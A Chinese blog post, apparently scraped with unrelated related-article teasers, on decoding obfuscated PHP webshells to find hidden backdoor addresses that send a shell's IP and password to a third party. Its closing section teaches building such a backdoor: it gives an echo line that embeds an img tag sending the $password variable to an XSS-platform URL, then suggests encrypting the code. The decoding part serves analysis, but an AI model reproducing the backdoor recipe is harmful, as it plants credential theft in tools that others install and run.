木马后门简单分析

article/2025/9/24 10:52:42

木马后门分析

加密过的马一种是为了过waf,另一种就是隐藏有后门

案例:记一次免杀木马后门分析

实操一:

image-20220329165208548

image-20220329170608948

image-20220329165346468

马已加密

1、解密

在变量前添加echo

image-20220329165505445

进入马子的页面

可以看到是base64的加密,复制从eval开始的加密代码,一直到结尾

image-20220329170844174

解密网站unphp.net

image-20220329170945911

2、分析

解密后复制源码,在notepad里分析

重要关注点:base64,因为整个代码是base64加密的

image-20220329171118799

可疑点

image-20220329171215318

又base加密了一串东西,和其他的不太一样

再次解密可疑点

image-20220329171653389

注意加上echo

得到结果

<?php http: //%71%79%76%63%2e%63%6f%6d/%70%68%70/?u=

发现仍存在URL编码

解密后得到一个网址

http://qyvc.com/php/?u=

可以发现此页面存在手脚,故意使人认为网页不存在,404页面

image-20220329172123174

这个就是后门的收信地址

当该木马被使用登录时,会自动将目标IP,登录密码等信息发送至收信地址,从而白嫖shell甚至删除你的后门只留下自己的权限

案例二

image-20220329173247731

image-20220329173311803

image-20220329173115873

这个马不只是打白工那么简单了,可以控制你的电脑

变量前加echo,注意不是所有变量都可以加echo

虽然这个马的第一个变量为str,但是在后面可以发现,str在dir中,也就是说我们要输出dir变量

image-20220329173740358

将eval换成echo

image-20220329173923464

访问并查看源代码

发现可疑网址

image-20220329174957109

image-20220329175023389

访问对方网站并下载木马在本机上

总体思路

echo输出出来,复制并解密,还原成明文,大致浏览后跟踪高危处

echo一般放有eval的变量前

删除后门后还原即可

简单后门制作

利用xss平台

创建项目—默认模块—keep session

image-20220329185600822

复制http://xsscom.com/index.php?do=api&id={projectId}&location=

单击下一步

将我们的编号替换到projectid处,http://xsscom.com/index.php?do=api&id=mq3dQs&location=

image-20220329185828042

有些平台可能已经给好了替换后的代码

在准备好的木马中写入

echo ‘<img width=height= src="http://xsscom.com/index.php?do=api&id=mq3dQs&location=’ .$password.’"/>’;

地址使用上面xss平台给的地址

在此木马被人使用后,即可上传信息到我们的xss平台中

image-20220329190909496

登录密码,URL等信息均会被上传

后期还可以自行对代码进行加密处理


http://chatgpt.dhexx.cn/article/8PgrK5eI.shtml

相关文章

灰鸽子--木马、后门实验

目录 实验目的 实验要求 实验原理 实验环境 实验步骤 实验目的 1.了解木马攻击的原理。 2. 掌握木马与后门工作机制 3. 掌握木马与后门的防范措施 实验要求 利用灰鸽子客户端配置服务器程序并生成服务端配置并生成服务器进行木马植入&#xff0c;通过灰鸽子客户端界面进行远…

【Web安全】木马与后门

一、认识木马与后门 后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段&#xff0c;程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是&#xff0c;如果这些后门被其他人知道&#xff0c;或是在发布软件之前没有删…

kindeditor上传图片宽度自适应

目前大多数情况下编辑器上传的图片都是在手机端显示&#xff0c;因此默认设置为宽度100%显示&#xff0c;避免图片显示的大大小小不好看。 目前使用的kindeditor版本为4.0.5。 打开kindeditor.js文件&#xff0c;拉到3116行insertimage方法内&#xff0c;注释掉设置宽度的3行代…

Kindeditor上传图片报错

使用Kindeditor编辑器上传图片时报如下错误&#xff0c;系统找不到LitJson名称空间 而实际上LitJson名称空间存在&#xff0c;LitJson.dll程序集存在于Bin目录中&#xff0c;网站目录如下 此时只需调整Bin目录所属位置即可 将Bin目录从EngTra文件夹移出&#xff0c;使之与EngTr…

KindEditor上传图片word

由于工作需要必须将word文档内容粘贴到编辑器中使用 但发现word中的图片粘贴后变成了file:///xxxx.jpg这种内容&#xff0c;如果上传到服务器后其他人也访问不了&#xff0c;网上找了很多编辑器发现没有一个能直接解决这个问题 考虑到自己除了工作其他时间基本上不使用window…

使用KindEditor实现图片上传、提交文字数据

KindEditor 是一套开源的 HTML 可视化编辑器&#xff0c;主要用于让用户在网站上获得所见即 所得编辑效果&#xff0c;兼容 IE、Firefox、Chrome、Safari、Opera 等主流浏览器。 KindEditor 使用 JavaScript 编写&#xff0c;可以无缝的于 Java、.NET、PHP、ASP 等程序接合。…

kindeditor 上传图片后端成功了,web显示上传失败 ,已解决

别人是什么都懂&#xff0c;然后写上代码教大家怎么做&#xff0c;而我只是一个被自己蠢哭的啥都不会的yang 今天我就来告诉大家&#xff0c;被自己蠢哭是啥意思 springboot实现图片上传&#xff0c;我以前不知道原来是有kindeditor这个html在线编辑器 大概长这样&#xff0c…

springboot中kindeditor 上传图片及其富文本的使用

话不多少&#xff0c;直接进入话题。 首先需要在前端页面中引入kindeditor 库 <script src"../js/kindeditor-all.js"></script>标注黄色的是重点&#xff0c;必须引入 其次写前端代码,注意我这个前端代码是springboot推荐的themleaf写的&#xff0c;其…

kindEditor的上传图片点击没反应,bug修复

基于layui的bug的层级问题 修改kindeditor.js中的811213全部替换为19892000 811212替换为19891999 811214替换为19892001 811211替换为19891998 基于电脑的显示问题x&#xff0c;y的坐标没有取整&#xff0c;有小数点不识别的问题 修改kindeditor.js中x&#xff0c;y的取整&am…

kindeditor 上传图片失败问题总结

1.近段时间一直在处理kindeditor上传图片失败的问题&#xff0c;前期一直以为是前端的问题&#xff0c;利用谷歌控制台&#xff0c;打断点&#xff0c;修改方法&#xff0c;一直都找不到解决方案&#xff0c;直到查看服务器配置&#xff0c;才发现&#xff1a; WEB 1号服务器 /…

KindEditor上传图片和修改图片

1.首先就是下载KindEditor&#xff08;这里是官网的地址&#xff09; 2. 部署编辑器 解压 kindeditor-x.x.x.zip 文件&#xff0c;将所有文件上传到您的网站程序目录里&#xff0c;例如&#xff1a;http://您的域名/editor/ Note 您可以根据需求删除以下目录后上传到服务器。…

kindeditor php 上传错误,kindeditor 上传图片失败,该怎么解决

本帖最后由 nxgg8 于 2014-05-29 12:44:04 编辑 编辑器版本&#xff1a;KindEditor 4.1.10 php框架&#xff1a;ThinkPHP3.2.2 这是html页面中引用编辑器配置 上传图片的时候出问题,不管是单张图片&#xff0c;还是批量。都会提示以下信息&#xff0c;返回的图片路径是正确的&a…

Kindeditor的简单使用以及图片上传

详细的笔者也不是特别懂&#xff0c;但是基本的使用还是会的 首先到官网下载相应的插件http://kindeditor.net/down.php&#xff0c;下载完的文件打开后是这样的&#xff0c;看着有点多 但是我们只取出需要的&#xff0c;只有这么一点&#xff0c;复制到项目下&#xff0c;取名…

KindEditor上传图片及使用

本文为原创&#xff0c;只为互相学习&#xff01; 主页:写程序的小王叔叔的博客欢迎来访&#x1f440; 支持:点赞收藏关注 社区:JAVA全栈进阶学习社区欢迎加入​​​​​​​ 编辑器使用 1&#xff09;官网&#xff1a;在线HTML编辑器 2&#xff09;使用 如果在编辑器中&#…

KindEditor上传本地图片

自己动手配置了一下KindEditor文本编辑器上传本地图片的功能&#xff0c;不需要动手写action&#xff0c;相关详细配置和代码如下。 我用的是KindEditor 4.1.10的版本&#xff0c;需要用到的童鞋去下载对应的版本。 1.↓↓↓这个插件里面需要手动配置的两个重要的jsp文件。 …

kindeditor4.1.10图片上传配置及使用说明

1效果展示 1.1 点击图片上传按钮 1.2 弹出选择框,可以从已上传的图片中选择上传,也可以从本地上传。 1.3选择从图片空间上传,文件夹模式浏览所有已上传的图片 1.4从本地选择图片上传 1.5上传效果 1.6 上传路径: WebRoot/upload/image 2-1:kindeditor-4.1.10版本插件 2-2:…

onpaste事件的浅谈

今天看书的时候&#xff0c;偶然看到onpaste的这个属性所以记录下来&#xff0c;为以后查阅而用&#xff1a; 具体的用法是<input type“text” οnpaste"function ***"/>&#xff0c;标签只是用来做说明并不是非得是input标签 虽然是触发的条件是&#xff1…

手机html粘贴事件,详解浏览器中的粘贴事件 paste onpaste 事件

在最新的H5 API里已经有了对粘贴事件的支持, 事件名为paste, 平时用的较少,但最近想做一个粘贴板管理器,于是就调研了一下这个粘贴,复制事件. 那么调研的第一步是什么那? 当然是百度了,但高手都不百度,直接控制台调试 创建一个id为editor的文本域, 为其添加一个paste事件的…

onkeyup事件,onpaste事件,完成实时表单验证

先上效果图&#xff1a; input框&#xff0c;用户输入值的方式就两种&#xff0c;一种是键盘输入&#xff0c;一种是鼠标粘贴。onkeyup事件可以在键盘输入的时候绑定事件&#xff0c;onpaste"return false"&#xff0c;设置不允许粘贴。 onkeyup进行表单验证的优…

利用JavaScript从剪贴板获取图片并上传服务器

1、参考&#xff1a; 使用 JavaScript File API 实现文件上传FileReader.readAsDataURL()基于Servlet3的文件上传中的示例2&#xff1a;基于JQuery的单文件上传 2、onpaste 剪贴板事件 onpaste 事件在用户向元素中粘贴文本时触发。有三种方式可以在元素中粘贴内容&#xff1…